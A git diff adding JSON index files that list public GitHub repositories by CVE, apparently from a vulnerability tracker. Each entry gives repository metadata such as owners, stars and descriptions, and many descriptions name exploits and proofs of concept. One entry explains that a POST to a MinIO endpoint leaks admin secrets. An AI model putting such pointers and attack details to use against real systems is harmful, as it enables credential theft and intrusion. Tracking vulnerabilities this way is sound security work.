"public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 707634565, + "name": "CVE-2023-28432", + "full_name": "yTxZx\/CVE-2023-28432", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yTxZx\/CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2023-10-20T10:20:10Z", + "updated_at": "2024-01-12T02:54:35Z", + "pushed_at": "2023-10-20T10:26:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723777809, + "name": "CVE-2023-28432-minio_update_rce", + "full_name": "unam4\/CVE-2023-28432-minio_update_rce", + "owner": { + "login": "unam4", + "id": 66824584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66824584?v=4", + "html_url": "https:\/\/github.com\/unam4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unam4\/CVE-2023-28432-minio_update_rce", + "description": "https:\/\/github.com\/AbelChe\/evil_minio\/tree\/main 打包留存", + "fork": false, + "created_at": "2023-11-26T18:23:33Z", + "updated_at": "2024-09-06T07:00:17Z", + "pushed_at": "2023-11-26T18:36:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728488310, + "name": "CVE-2023-28432", + "full_name": "C1ph3rX13\/CVE-2023-28432", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-28432", + "description": "CVE-2023-28432 Minio Information isclosure Exploit", + "fork": false, + "created_at": "2023-12-07T03:33:37Z", + "updated_at": "2023-12-07T19:37:00Z", + "pushed_at": "2023-12-25T09:41:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740067240, + "name": "CVE-2023-28432", + "full_name": "netuseradministrator\/CVE-2023-28432", + "owner": { + "login": "netuseradministrator", + "id": 96680088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96680088?v=4", + "html_url": "https:\/\/github.com\/netuseradministrator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netuseradministrator\/CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2024-01-07T12:34:49Z", + "updated_at": "2024-01-31T02:25:36Z", + "pushed_at": "2024-01-07T15:20:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741968176, + "name": "CVE-2023-28432", + "full_name": "xk-mt\/CVE-2023-28432", + "owner": { + "login": "xk-mt", + "id": 77874955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77874955?v=4", + "html_url": "https:\/\/github.com\/xk-mt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xk-mt\/CVE-2023-28432", + "description": "minio系统存在信息泄露漏洞,未经身份认证的远程攻击,通过发送特殊POST请求到\/minio\/bootstrap\/v1\/verify即可获取所有敏感信息,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可能导致管理员账号密码泄露。", + "fork": false, + "created_at": "2024-01-11T13:41:20Z", + "updated_at": "2024-01-11T14:56:48Z", + "pushed_at": "2024-01-15T08:35:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786121269, + "name": "CVE-2023-28432", + "full_name": "0xRulez\/CVE-2023-28432", + "owner": { + "login": "0xRulez", + "id": 103935434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103935434?v=4", + "html_url": "https:\/\/github.com\/0xRulez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRulez\/CVE-2023-28432", + "description": "MinIO vulnerability exploit - CVE-2023-28432", + "fork": false, + "created_at": "2024-04-13T13:52:43Z", + "updated_at": "2024-07-05T02:54:45Z", + "pushed_at": "2024-04-13T13:56:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28434.json b/2023/CVE-2023-28434.json new file mode 100644 index 0000000000..7c498bb22c --- /dev/null +++ b/2023/CVE-2023-28434.json @@ -0,0 +1,36 @@ +[ + { + "id": 619494083, + "name": "evil_minio", + "full_name": "AbelChe\/evil_minio", + "owner": { + "login": "AbelChe", + "id": 40518242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40518242?v=4", + "html_url": "https:\/\/github.com\/AbelChe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbelChe\/evil_minio", + "description": "EXP for CVE-2023-28434 MinIO unauthorized to RCE", + "fork": false, + "created_at": "2023-03-27T08:53:04Z", + "updated_at": "2024-11-21T06:22:45Z", + "pushed_at": "2023-04-04T05:26:59Z", + "stargazers_count": 307, + "watchers_count": 307, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28434", + "minio" + ], + "visibility": "public", + "forks": 38, + "watchers": 307, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28447.json b/2023/CVE-2023-28447.json new file mode 100644 index 0000000000..3e3b12e724 --- /dev/null +++ b/2023/CVE-2023-28447.json @@ -0,0 +1,33 @@ +[ + { + "id": 621271126, + "name": "lblfixer_cve_2023_28447", + "full_name": "drkbcn\/lblfixer_cve_2023_28447", + "owner": { + "login": "drkbcn", + "id": 2090227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2090227?v=4", + "html_url": "https:\/\/github.com\/drkbcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drkbcn\/lblfixer_cve_2023_28447", + "description": "Module for PrestaShop 1.7.X to fix CVE-2023-28447 vulnerability (Smarty XSS)", + "fork": false, + "created_at": "2023-03-30T10:28:20Z", + "updated_at": "2024-06-17T10:32:48Z", + "pushed_at": "2023-03-30T10:32:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28467.json b/2023/CVE-2023-28467.json new file mode 100644 index 0000000000..4a437dc2e3 --- /dev/null +++ b/2023/CVE-2023-28467.json @@ -0,0 +1,33 @@ +[ + { + "id": 669606296, + "name": "CVE-2023-28467", + "full_name": "ahmetaltuntas\/CVE-2023-28467", + "owner": { + "login": "ahmetaltuntas", + "id": 12846006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12846006?v=4", + "html_url": "https:\/\/github.com\/ahmetaltuntas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetaltuntas\/CVE-2023-28467", + "description": null, + "fork": false, + "created_at": "2023-07-22T20:37:15Z", + "updated_at": "2023-11-17T00:57:47Z", + "pushed_at": "2023-07-22T21:06:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28588.json b/2023/CVE-2023-28588.json new file mode 100644 index 0000000000..51c68a5924 --- /dev/null +++ b/2023/CVE-2023-28588.json @@ -0,0 +1,188 @@ +[ + { + "id": 742448622, + "name": "CVE-2023-28588", + "full_name": "uthrasri\/CVE-2023-28588", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-12T13:59:34Z", + "updated_at": "2024-01-12T14:02:22Z", + "pushed_at": "2024-01-19T10:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742454957, + "name": "CVE-2023-28588", + "full_name": "Trinadh465\/CVE-2023-28588", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-12T14:15:42Z", + "updated_at": "2024-01-12T16:38:02Z", + "pushed_at": "2024-01-12T14:20:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742472564, + "name": "CVE-2023-28588_system_bt", + "full_name": "uthrasri\/CVE-2023-28588_system_bt", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_system_bt", + "description": "system_bt_CVE-2023-28588", + "fork": false, + "created_at": "2024-01-12T14:58:59Z", + "updated_at": "2024-01-12T15:00:53Z", + "pushed_at": "2024-01-12T15:13:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745490193, + "name": "CVE-2023-28588_Singlefile", + "full_name": "uthrasri\/CVE-2023-28588_Singlefile", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_Singlefile", + "description": null, + "fork": false, + "created_at": "2024-01-19T12:58:22Z", + "updated_at": "2024-01-19T13:06:38Z", + "pushed_at": "2024-01-19T13:07:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745534292, + "name": "G2.5_CVE-2023-28588", + "full_name": "uthrasri\/G2.5_CVE-2023-28588", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/G2.5_CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-19T14:46:51Z", + "updated_at": "2024-01-19T14:46:51Z", + "pushed_at": "2024-01-19T14:46:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746664124, + "name": "CVE-2023-28588_G2.5_singlefile", + "full_name": "uthrasri\/CVE-2023-28588_G2.5_singlefile", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_G2.5_singlefile", + "description": null, + "fork": false, + "created_at": "2024-01-22T13:17:35Z", + "updated_at": "2024-01-22T13:18:30Z", + "pushed_at": "2024-01-22T13:19:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2859.json b/2023/CVE-2023-2859.json new file mode 100644 index 0000000000..b2c1a39f31 --- /dev/null +++ b/2023/CVE-2023-2859.json @@ -0,0 +1,33 @@ +[ + { + "id": 644829145, + "name": "CVE-2023-2859", + "full_name": "mnqazi\/CVE-2023-2859", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2859", + "description": "CVE-2023-2859 Medium Blog", + "fork": false, + "created_at": "2023-05-24T10:46:34Z", + "updated_at": "2023-05-24T11:01:28Z", + "pushed_at": "2023-05-24T10:59:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2868.json b/2023/CVE-2023-2868.json new file mode 100644 index 0000000000..3a7c1c02de --- /dev/null +++ b/2023/CVE-2023-2868.json @@ -0,0 +1,95 @@ +[ + { + "id": 656339964, + "name": "poc-cve-2023-2868", + "full_name": "cfielding-r7\/poc-cve-2023-2868", + "owner": { + "login": "cfielding-r7", + "id": 131053218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131053218?v=4", + "html_url": "https:\/\/github.com\/cfielding-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cfielding-r7\/poc-cve-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-06-20T18:43:54Z", + "updated_at": "2024-06-21T10:27:27Z", + "pushed_at": "2023-07-05T20:02:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672605144, + "name": "CVE-2023-2868CVE-2023-2868", + "full_name": "cashapp323232\/CVE-2023-2868CVE-2023-2868", + "owner": { + "login": "cashapp323232", + "id": 64687677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64687677?v=4", + "html_url": "https:\/\/github.com\/cashapp323232", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cashapp323232\/CVE-2023-2868CVE-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-07-30T16:42:27Z", + "updated_at": "2023-07-30T16:42:27Z", + "pushed_at": "2023-08-05T12:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683041709, + "name": "CVE-2023-2868", + "full_name": "krmxd\/CVE-2023-2868", + "owner": { + "login": "krmxd", + "id": 48358384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48358384?v=4", + "html_url": "https:\/\/github.com\/krmxd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krmxd\/CVE-2023-2868", + "description": null, + "fork": false, + "created_at": "2023-08-25T13:07:51Z", + "updated_at": "2023-08-25T13:07:51Z", + "pushed_at": "2023-08-25T13:08:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28753.json b/2023/CVE-2023-28753.json new file mode 100644 index 0000000000..7e3cbca576 --- /dev/null +++ b/2023/CVE-2023-28753.json @@ -0,0 +1,33 @@ +[ + { + "id": 856641353, + "name": "CVE-2023-28753", + "full_name": "pingjuiliao\/CVE-2023-28753", + "owner": { + "login": "pingjuiliao", + "id": 40479475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40479475?v=4", + "html_url": "https:\/\/github.com\/pingjuiliao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pingjuiliao\/CVE-2023-28753", + "description": "pwning netconsd", + "fork": false, + "created_at": "2024-09-12T23:57:39Z", + "updated_at": "2024-09-14T05:41:16Z", + "pushed_at": "2024-09-14T05:41:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2877.json b/2023/CVE-2023-2877.json new file mode 100644 index 0000000000..edf04d7426 --- /dev/null +++ b/2023/CVE-2023-2877.json @@ -0,0 +1,33 @@ +[ + { + "id": 659681397, + "name": "CVE-2023-2877", + "full_name": "RandomRobbieBF\/CVE-2023-2877", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2877", + "description": "Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution", + "fork": false, + "created_at": "2023-06-28T10:34:08Z", + "updated_at": "2024-08-12T20:31:56Z", + "pushed_at": "2023-06-28T11:25:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28771.json b/2023/CVE-2023-28771.json new file mode 100644 index 0000000000..a41f81231a --- /dev/null +++ b/2023/CVE-2023-28771.json @@ -0,0 +1,35 @@ +[ + { + "id": 644192831, + "name": "CVE-2023-28771-PoC", + "full_name": "benjaminhays\/CVE-2023-28771-PoC", + "owner": { + "login": "benjaminhays", + "id": 106408899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106408899?v=4", + "html_url": "https:\/\/github.com\/benjaminhays", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benjaminhays\/CVE-2023-28771-PoC", + "description": "PoC for CVE-2023-28771 based on Rapid7's excellent writeup", + "fork": false, + "created_at": "2023-05-23T02:37:39Z", + "updated_at": "2024-06-19T11:16:08Z", + "pushed_at": "2023-05-23T02:49:05Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28771" + ], + "visibility": "public", + "forks": 7, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28772.json b/2023/CVE-2023-28772.json new file mode 100644 index 0000000000..68f487c37b --- /dev/null +++ b/2023/CVE-2023-28772.json @@ -0,0 +1,95 @@ +[ + { + "id": 639306883, + "name": "linux-4.1.15_CVE-2023-28772", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-28772", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-11T07:47:25Z", + "updated_at": "2023-05-11T08:29:54Z", + "pushed_at": "2023-05-11T13:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639374711, + "name": "linux-4.1.15_CVE-2023-28772", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2023-28772", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-11T10:46:48Z", + "updated_at": "2023-05-11T10:52:38Z", + "pushed_at": "2023-05-12T09:29:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639746800, + "name": "kernel_v4.1.15_CVE-2023-28772", + "full_name": "hshivhare67\/kernel_v4.1.15_CVE-2023-28772", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.1.15_CVE-2023-28772", + "description": null, + "fork": false, + "created_at": "2023-05-12T06:19:09Z", + "updated_at": "2023-05-12T06:37:08Z", + "pushed_at": "2023-05-12T10:28:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28810.json b/2023/CVE-2023-28810.json new file mode 100644 index 0000000000..21285cb5e4 --- /dev/null +++ b/2023/CVE-2023-28810.json @@ -0,0 +1,33 @@ +[ + { + "id": 655545639, + "name": "CVE-2023-28810", + "full_name": "skylightcyber\/CVE-2023-28810", + "owner": { + "login": "skylightcyber", + "id": 49059122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49059122?v=4", + "html_url": "https:\/\/github.com\/skylightcyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skylightcyber\/CVE-2023-28810", + "description": "Exploit code for CVE-2023-28810", + "fork": false, + "created_at": "2023-06-19T05:57:22Z", + "updated_at": "2023-09-15T00:05:49Z", + "pushed_at": "2023-06-19T06:39:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29007.json b/2023/CVE-2023-29007.json new file mode 100644 index 0000000000..f4afcaaedc --- /dev/null +++ b/2023/CVE-2023-29007.json @@ -0,0 +1,97 @@ +[ + { + "id": 632970924, + "name": "CVE-2023-29007", + "full_name": "ethiack\/CVE-2023-29007", + "owner": { + "login": "ethiack", + "id": 99984073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99984073?v=4", + "html_url": "https:\/\/github.com\/ethiack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethiack\/CVE-2023-29007", + "description": "PoC repository for CVE-2023-29007", + "fork": false, + "created_at": "2023-04-26T14:00:11Z", + "updated_at": "2024-10-21T10:38:44Z", + "pushed_at": "2023-04-26T14:21:51Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 13, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 635547855, + "name": "CVE-2023-29007", + "full_name": "omespino\/CVE-2023-29007", + "owner": { + "login": "omespino", + "id": 8670352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8670352?v=4", + "html_url": "https:\/\/github.com\/omespino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omespino\/CVE-2023-29007", + "description": null, + "fork": false, + "created_at": "2023-05-02T23:47:51Z", + "updated_at": "2023-05-02T23:48:04Z", + "pushed_at": "2023-05-03T00:13:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637089393, + "name": "CVE-2023-29007_win-version", + "full_name": "x-Defender\/CVE-2023-29007_win-version", + "owner": { + "login": "x-Defender", + "id": 73282041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73282041?v=4", + "html_url": "https:\/\/github.com\/x-Defender", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x-Defender\/CVE-2023-29007_win-version", + "description": null, + "fork": false, + "created_at": "2023-05-06T13:25:35Z", + "updated_at": "2023-05-23T11:09:31Z", + "pushed_at": "2023-05-06T13:32:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29017.json b/2023/CVE-2023-29017.json new file mode 100644 index 0000000000..af213e3a8e --- /dev/null +++ b/2023/CVE-2023-29017.json @@ -0,0 +1,64 @@ +[ + { + "id": 624975184, + "name": "seongil-wi-CVE-2023-29017", + "full_name": "timb-machine-mirrors\/seongil-wi-CVE-2023-29017", + "owner": { + "login": "timb-machine-mirrors", + "id": 49810875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4", + "html_url": "https:\/\/github.com\/timb-machine-mirrors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timb-machine-mirrors\/seongil-wi-CVE-2023-29017", + "description": "Clone from gist", + "fork": false, + "created_at": "2023-04-07T18:26:25Z", + "updated_at": "2023-04-13T15:04:33Z", + "pushed_at": "2023-04-07T18:26:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668528727, + "name": "CVE-2023-29017-reverse-shell", + "full_name": "passwa11\/CVE-2023-29017-reverse-shell", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-29017-reverse-shell", + "description": null, + "fork": false, + "created_at": "2023-07-20T03:04:26Z", + "updated_at": "2023-12-27T16:19:20Z", + "pushed_at": "2023-04-10T20:24:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29084.json b/2023/CVE-2023-29084.json new file mode 100644 index 0000000000..403d27a557 --- /dev/null +++ b/2023/CVE-2023-29084.json @@ -0,0 +1,33 @@ +[ + { + "id": 628788120, + "name": "CVE-2023-29084", + "full_name": "ohnonoyesyes\/CVE-2023-29084", + "owner": { + "login": "ohnonoyesyes", + "id": 